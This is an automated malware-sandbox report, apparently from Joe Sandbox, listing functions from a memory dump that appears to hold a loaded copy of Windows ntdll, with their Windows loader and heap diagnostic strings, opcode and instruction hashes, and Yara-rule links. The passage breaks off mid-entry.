                                                                                                              • Instruction ID: 155a98c67026559d5ed83f444e3bd933b13a9dad264448ecedae1ef35d44da62
                                                                                                              • Opcode Fuzzy Hash: 19d7fc730624691cca0b1c803f7521839232dd3e5fcd66e3cca29017b00c067e
                                                                                                              • Instruction Fuzzy Hash: 089189B1508345AFDB22DF25CC44FBBFAECEB84744F80092EFA8496156E734D9048B62
                                                                                                              Function 0176273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017A22B6
                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017A21D9, 017A22B1
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 017A21DE
                                                                                                              • .Local, xrefs: 017628D8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                              • API String ID: 0-1239276146
                                                                                                              • Opcode ID: ca921221edd4ff7072300fc0381c1c1c925bc784735eba9d45f306bfab422e9e
                                                                                                              • Instruction ID: 299935536e5a70445eaf632474a6d78ec26c5875d90e59543aa934c348074875
                                                                                                              • Opcode Fuzzy Hash: ca921221edd4ff7072300fc0381c1c1c925bc784735eba9d45f306bfab422e9e
                                                                                                              • Instruction Fuzzy Hash: 6FA1A03194422ADBDB65CF68CC88BA9F7B5BF98314F1541E9DD48A7292D7309E80CF90
                                                                                                              Function 01764AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017A3437
                                                                                                              • RtlDeactivateActivationContext, xrefs: 017A3425, 017A3432, 017A3451
                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017A3456
                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 017A342A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                              • API String ID: 0-1245972979
                                                                                                              • Opcode ID: d318b21c381089decbdf8137aa1a8ff49b5529fb68daf47987c101f53f8f9ddf
                                                                                                              • Instruction ID: a17cb9123b7041cec6de0c1789eec40e5e72f3faaab0ead6e59dc717738c260c
                                                                                                              • Opcode Fuzzy Hash: d318b21c381089decbdf8137aa1a8ff49b5529fb68daf47987c101f53f8f9ddf
                                                                                                              • Instruction Fuzzy Hash: 486111766007129BD726CF1CC885B3AF7E9FFC0B50F548669E95A9B245CB30E801CB91
                                                                                                              Function 017364AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01791028
                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0179106B
                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01790FE5
                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017910AE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                              • API String ID: 0-1468400865
                                                                                                              • Opcode ID: 2d7cfb22c3b98c3a8776d061c68822ac8f53b0c144750329c149aeeca79b7474
                                                                                                              • Instruction ID: edb1c165c01fbd6ee90b699cfc7afcae01eeb58de4fbdaa5f1c78e597994a378
                                                                                                              • Opcode Fuzzy Hash: 2d7cfb22c3b98c3a8776d061c68822ac8f53b0c144750329c149aeeca79b7474
                                                                                                              • Instruction Fuzzy Hash: DC71C4B1504305AFCB21DF18C888B9BBFA9EF94764F500468F9488B18BD734D689CBD2
                                                                                                              Function 01764D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 017A365C
                                                                                                              • LdrpFindDllActivationContext, xrefs: 017A3636, 017A3662
                                                                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 017A362F
                                                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 017A3640, 017A366C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                              • API String ID: 0-3779518884
                                                                                                              • Opcode ID: 1eaf6589b4c5eecafba4e44806bcbfbd18c50111dff0164bf88bf13e0fc76afe
                                                                                                              • Instruction ID: 48c595cb2aa1289b330c720f766ea225031fca6ef4cb540b3512a0289e5b3643
                                                                                                              • Opcode Fuzzy Hash: 1eaf6589b4c5eecafba4e44806bcbfbd18c50111dff0164bf88bf13e0fc76afe
                                                                                                              • Instruction Fuzzy Hash: 65311772E00211AEEF36AE0CC859B39F6ACBB21754F06816AEF0657151D7A0DDC08BD5
                                                                                                              Function 0175245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • apphelp.dll, xrefs: 01752462
                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0179A992
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0179A9A2
                                                                                                              • LdrpDynamicShimModule, xrefs: 0179A998
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-176724104
                                                                                                              • Opcode ID: 177f8688152c4c147c3053fd9cb0319cf4f8c86dc9bb47e86fdebf6434bd2960
                                                                                                              • Instruction ID: 16ebcf08774cd4105eff6bd1ddece48654c2b65bb82d6530acfa5d221b7b60e4
                                                                                                              • Opcode Fuzzy Hash: 177f8688152c4c147c3053fd9cb0319cf4f8c86dc9bb47e86fdebf6434bd2960
                                                                                                              • Instruction Fuzzy Hash: 09314871A00201EBDF329F5DE895A6AFBB5FB84710F254059ED00A724AD7B45A85CB80
                                                                                                              Function 017429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 01743255
                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0174327D
                                                                                                              • HEAP: , xrefs: 01743264
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                              • API String ID: 0-617086771
                                                                                                              • Opcode ID: 810492220d10d4c951e6205823cbbfa11fa4db71baba553591361c0bb0e1b965
                                                                                                              • Instruction ID: 6923ae33e1ede5849c32b2db0d08caa43051991a760c7241c48573af34bf1d80
                                                                                                              • Opcode Fuzzy Hash: 810492220d10d4c951e6205823cbbfa11fa4db71baba553591361c0bb0e1b965
                                                                                                              • Instruction Fuzzy Hash: 7692AB71A046599FEB25CF68D444BAEFBF1FF48300F188099E899AB392D735A941CF50
                                                                                                              Function 01740770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-4253913091
                                                                                                              • Opcode ID: f659f2d92c7fe2eba12e1344e2041ed895e808295329b99cd68116e2ab0a8760
                                                                                                              • Instruction ID: 1ccb5675b745a34f17a6e136f75a85057889f40830aa1b8ef4020fb23ab02a72
                                                                                                              • Opcode Fuzzy Hash: f659f2d92c7fe2eba12e1344e2041ed895e808295329b99cd68116e2ab0a8760
                                                                                                              • Instruction Fuzzy Hash: B8F1AB74600606DFEB26CF68D894BAAF7B5FF44300F1481A9E6169B385D734EA85CB90
                                                                                                              Function 01756962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $@
                                                                                                              • API String ID: 0-1077428164
                                                                                                              • Opcode ID: 25dd96d62d00ab14f7ab54a9bb3915110b0f5ee15d876b17cd9305144a30671f
                                                                                                              • Instruction ID: 4d9c514500f4892de776b65b26614185211c2c5fb648b227c99c1b0d240e6473
                                                                                                              • Opcode Fuzzy Hash: 25dd96d62d00ab14f7ab54a9bb3915110b0f5ee15d876b17cd9305144a30671f
                                                                                                              • Instruction Fuzzy Hash: FDC290716083419FEB69CF28C881BABFBE5AF88754F44896DF989C7241D774D804CB92
                                                                                                              Function 0172A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                              • API String ID: 0-2779062949
                                                                                                              • Opcode ID: c6309019dc4bc91819ab36907a0b8896bcfd38ac703f14d9d729cacdb54f6049
                                                                                                              • Instruction ID: e71b6a7d1dc35cc9b37f9cb1bab4548466d5b1f42271a7477bb0eda6ab6b042a
                                                                                                              • Opcode Fuzzy Hash: c6309019dc4bc91819ab36907a0b8896bcfd38ac703f14d9d729cacdb54f6049
                                                                                                              • Instruction Fuzzy Hash: C4A14C719416299BDB32EF68CC88BEAF7B8EF44710F1041E9E909A7250D7359E85CF50
                                                                                                              Function 01750BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • LdrpCheckModule, xrefs: 0179A117
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0179A121
                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0179A10F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-161242083
                                                                                                              • Opcode ID: 8614991a2e9021f8b85734ac57ee03a7c85a8be278d3da93afe859754c071efb
                                                                                                              • Instruction ID: e8b1b143c65c239a59f02888702f51d901c594050d76dbf95a22316b9314414c
                                                                                                              • Opcode Fuzzy Hash: 8614991a2e9021f8b85734ac57ee03a7c85a8be278d3da93afe859754c071efb
                                                                                                              • Instruction Fuzzy Hash: EA71CF70A002059FDF26DF68C994ABEF7F4FB44304F24846DE802AB255E774AE81CB50
                                                                                                              Function 01740A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-1334570610
                                                                                                              • Opcode ID: 977dd9ab6413690959300636ab0f160887afd38a048a1d478c1e366663be3cc1
                                                                                                              • Instruction ID: 744dc45f388daacf0d277a42be35c4d34a5fe97463bc17b53d54159c02430775
                                                                                                              • Opcode Fuzzy Hash: 977dd9ab6413690959300636ab0f160887afd38a048a1d478c1e366663be3cc1
                                                                                                              • Instruction Fuzzy Hash: D961A070600301DFDB2ACF28D844BAAFBE1FF45708F14859AE5558B296D770E941CB95
                                                                                                              Function 0176C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017A82E8
                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 017A82DE
                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 017A82D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1783798831
                                                                                                              • Opcode ID: f45d0d38ef0ce8d94c846ed36f50154b17e1c5357bbe27eac8af1646398a0d43
                                                                                                              • Instruction ID: 9bc065b2b5ddb101738f7a952c9754e873f486d79a2f2ef14eb05ca012466e0d
                                                                                                              • Opcode Fuzzy Hash: f45d0d38ef0ce8d94c846ed36f50154b17e1c5357bbe27eac8af1646398a0d43
                                                                                                              • Instruction Fuzzy Hash: 9A41CF71544311ABC732EF68D848B5BF7E8FB48650F10892AFE98D3295E774D9008B92
                                                                                                              Function 017EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017EC1C5
                                                                                                              • @, xrefs: 017EC1F1
                                                                                                              • PreferredUILanguages, xrefs: 017EC212
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                              • API String ID: 0-2968386058
                                                                                                              • Opcode ID: f835dea1fb29dc57a445baffedc2cb745d4218f39646524942e728d4a77b9afc
                                                                                                              • Instruction ID: 263dfbdc5179beb234f91a6413b022abd1922a3084ef6f2bd4780b71e4ee4c10
                                                                                                              • Opcode Fuzzy Hash: f835dea1fb29dc57a445baffedc2cb745d4218f39646524942e728d4a77b9afc
                                                                                                              • Instruction Fuzzy Hash: B8418375E04219EBDF12DBD8C859FEEFBFCAB18704F10406AE609B7240D7749A448B50
                                                                                                              Function 017C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                              • API String ID: 0-1373925480
                                                                                                              • Opcode ID: 69b6a4366d48d164839c18b6c57761c54cbb0e1a117a98f942fe5f62735a545a
                                                                                                              • Instruction ID: d36840e083c6461e3094238595bfba5fea09a5075e5e45e850d1c9455866b6ac
                                                                                                              • Opcode Fuzzy Hash: 69b6a4366d48d164839c18b6c57761c54cbb0e1a117a98f942fe5f62735a545a
                                                                                                              • Instruction Fuzzy Hash: 8241F372A042588BEB26DBE8CC58BADFBB9FFA5B40F14045DD942EB785D7748901CB10
                                                                                                              Function 017B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • LdrpCheckRedirection, xrefs: 017B488F
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 017B4899
                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017B4888
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-3154609507
                                                                                                              • Opcode ID: ed8523b3eb5965d21915ca7301f414c978b5a7bb16c935a2039a8c329e906480
                                                                                                              • Instruction ID: 1750b3ba3d392de61f200a0822b763ec551ed660ca01ce348e861a5bfebc43d7
                                                                                                              • Opcode Fuzzy Hash: ed8523b3eb5965d21915ca7301f414c978b5a7bb16c935a2039a8c329e906480
                                                                                                              • Instruction Fuzzy Hash: 5141A372A447519FCB22CE5DD8C0BA6FBE4AF49650F050669ED8BD7257D730E800CB91
                                                                                                              Function 01740BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-2558761708
                                                                                                              • Opcode ID: 8282ec6e78eb59f48dee1b7c5cdaee008811f73c95c14594984923604a60d39a
                                                                                                              • Instruction ID: e004d0dc8d41594d81ff3cbb5ccb7500000ab659c04f16371dbf1532d31b9971
                                                                                                              • Opcode Fuzzy Hash: 8282ec6e78eb59f48dee1b7c5cdaee008811f73c95c14594984923604a60d39a
                                                                                                              • Instruction Fuzzy Hash: 11112170315122CFDB6ACB18D854FBAF3A4EF40615F18816AF606CB265DB30D845CB44
                                                                                                              Function 017B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • LdrpInitializationFailure, xrefs: 017B20FA
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017B2104
                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 017B20F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2986994758
                                                                                                              • Opcode ID: fdfd8e136f198ee38b94825e1e836f228c2f413e4081b43eefc2d54013893ebf
                                                                                                              • Instruction ID: e0167b30d4c7a33d60a326c9584e0af075d266b751c7b81b8d7e78d0a18cccf4
                                                                                                              • Opcode Fuzzy Hash: fdfd8e136f198ee38b94825e1e836f228c2f413e4081b43eefc2d54013893ebf
                                                                                                              • Instruction Fuzzy Hash: A0F0C87578130CAFEB34EA4CDC67FD9B768EB44B54F504069FA006B68AD6B0A600CA51
                                                                                                              Function 017403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: #%u
                                                                                                              • API String ID: 48624451-232158463
                                                                                                              • Opcode ID: 61979af25224719be0c2e9361d7f52eeb5c59335c7049c48786d743ccac6cf5f
                                                                                                              • Instruction ID: c8974549364d99d311369286c892d7ab98c58010af7e543bb307fd5768cc8548
                                                                                                              • Opcode Fuzzy Hash: 61979af25224719be0c2e9361d7f52eeb5c59335c7049c48786d743ccac6cf5f
                                                                                                              • Instruction Fuzzy Hash: EA714771A0014A9FDB01DFA8D994FAEBBF8BF08704F144065EA05E7255EB34EE45CBA0
                                                                                                              Function 0173A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • LdrResSearchResource Exit, xrefs: 0173AA25
                                                                                                              • LdrResSearchResource Enter, xrefs: 0173AA13
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                              • API String ID: 0-4066393604
                                                                                                              • Opcode ID: a3615412cb57829f73e13e8fa0d1c8fb2e4a5a3348af7602ee40fb89bb12ad1a
                                                                                                              • Instruction ID: 664489243a321e02717a8daffab9262bda267ecc94eb917b5a51e49cafaef7b3
                                                                                                              • Opcode Fuzzy Hash: a3615412cb57829f73e13e8fa0d1c8fb2e4a5a3348af7602ee40fb89bb12ad1a
                                                                                                              • Instruction Fuzzy Hash: 06E1A271E00209AFEF26DFA8D985BAEFBBAFF94310F100469E941E7252D7349945CB50
                                                                                                              Function 017FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `$`
                                                                                                              • API String ID: 0-197956300
                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                              • Instruction ID: 47a455d474e48fc495d3d3e464a42f52781150a3e6b3c7e5acf3cc0012cdff5b
                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                              • Instruction Fuzzy Hash: DCC1AC312043429BEB25CF28C845B6BFBE5AFD4318F184A2DF69A8B391D774D505CB92
                                                                                                              Function 017AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Legacy$UEFI
                                                                                                              • API String ID: 2994545307-634100481
                                                                                                              • Opcode ID: 4554f8df5c35cb563b68c577ed0ffc73b4b23f9ed15228f767e20941ee93d760
                                                                                                              • Instruction ID: cc74388a43568bc3274a701ab56032ad523567ca544333135db1229e2a69f2f7
                                                                                                              • Opcode Fuzzy Hash: 4554f8df5c35cb563b68c577ed0ffc73b4b23f9ed15228f767e20941ee93d760
                                                                                                              • Instruction Fuzzy Hash: E0616C71E403099FDB15DFA8C880BADFBB5FB88700F94416DE649EB291DB31A940CB50
                                                                                                              Function 017D43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$MUI
                                                                                                              • API String ID: 0-17815947
                                                                                                              • Opcode ID: 6e62c20c18bfe6788a6f69959ccca86f420b5c5da5e85db6eab7d574e6f2055b
                                                                                                              • Instruction ID: 23551c9b215801fbeae07a0cb64ec8dda8d517525edec183ace09fc6dfbf1917
                                                                                                              • Opcode Fuzzy Hash: 6e62c20c18bfe6788a6f69959ccca86f420b5c5da5e85db6eab7d574e6f2055b
                                                                                                              • Instruction Fuzzy Hash: 82511671E0021DAEDF11DFA9CC84AEEFBB9EB44754F100529EA12A7691D7309A45CB60
                                                                                                              Function 017304E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • kLsE, xrefs: 01730540
                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0173063D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                              • API String ID: 0-2547482624
                                                                                                              • Opcode ID: 9194c7220f2c715bd620de85860a49d66fd70cf6d00794c449dc2370aca40808
                                                                                                              • Instruction ID: 925d3c4258a1115b4f2cac76fa5e6e016425c75406ea8fc8e4ba842335c61ab0
